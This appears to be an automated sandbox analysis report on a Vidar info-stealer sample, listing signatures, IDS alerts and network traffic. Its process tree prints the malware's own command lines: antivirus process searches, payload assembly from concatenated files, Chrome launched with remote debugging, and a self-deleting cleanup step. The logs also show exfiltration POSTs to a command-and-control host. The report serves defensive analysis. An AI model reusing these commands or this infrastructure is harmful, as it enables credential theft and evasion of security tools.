Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CenteredDealing.exe

Overview

General Information

Sample name:CenteredDealing.exe
Analysis ID:1582918
MD5:228e734f246564bb255b68d51bd6d31e
SHA1:13a36ae7bd290f4d7aba808d4435eb04008d3ac8
SHA256:7174de5abf7299d3c6ab5460d57ff110be491dc47325c24465281200852f0f9a
Tags:exeuser-SquiblydooBlog
Infos:

Detection

Vidar
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • CenteredDealing.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\CenteredDealing.exe" MD5: 228E734F246564BB255B68D51BD6D31E)
    • cmd.exe (PID: 7568 cmdline: "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7640 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7652 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7688 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7696 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7732 cmdline: cmd /c md 208639 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7744 cmdline: extrac32 /Y /E Dodge MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7768 cmdline: findstr /V "Borough" Architecture MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7784 cmdline: cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7800 cmdline: cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson d MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Rip.com (PID: 7816 cmdline: Rip.com d MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 7272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2608 --field-trial-handle=2480,i,18006708622836409886,5540155705252111612,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 4564 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8y5fk" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 8052 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7832 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Sigma Signatures

    Sigma detected: Browser Started with Remote Debugging
    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Rip.com d, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com, ParentProcessId: 7816, ParentProcessName: Rip.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7272, ProcessName: chrome.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Sigma detected: Search for Antivirus process
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7696, ProcessName: findstr.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T21:33:26.891373+010020442471Malware Command and Control Activity Detected116.203.13.109443192.168.2.449741TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T21:33:28.216201+010020518311Malware Command and Control Activity Detected116.203.13.109443192.168.2.449742TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T21:33:25.502688+010020490871A Network Trojan was detected192.168.2.449740116.203.13.109443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T21:33:24.150881+010028593781Malware Command and Control Activity Detected192.168.2.449739116.203.13.109443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
    Source: CenteredDealing.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 116.203.13.109:443 -> 192.168.2.4:49737 version: TLS 1.2
    Source: CenteredDealing.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: chrome.exeMemory has grown: Private usage: 8MB later: 41MB

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49740 -> 116.203.13.109:443
    Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49739 -> 116.203.13.109:443
    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.13.109:443 -> 192.168.2.4:49741
    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.13.109:443 -> 192.168.2.4:49742
    Source: global trafficTCP traffic: 192.168.2.4:49799 -> 162.159.36.2:53
    Source: global trafficHTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
    Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: h7h7h7.onlineConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000011.00000003.1985883620.000064DC00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1985539829.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1986117003.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: chrome.exe, 00000011.00000003.1985883620.000064DC00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1985539829.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1986117003.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRm
    Source: global trafficDNS traffic detected: DNS query: t.me
    Source: global trafficDNS traffic detected: DNS query: h7h7h7.online
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
    Source: global trafficDNS traffic detected: DNS query: apis.google.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: global trafficDNS traffic detected: DNS query: 56.163.245.4.in-addr.arpa
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----euk6p89zcba1n7ymycb1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: h7h7h7.onlineContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
    Source: chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
    Source: chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
    Source: chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
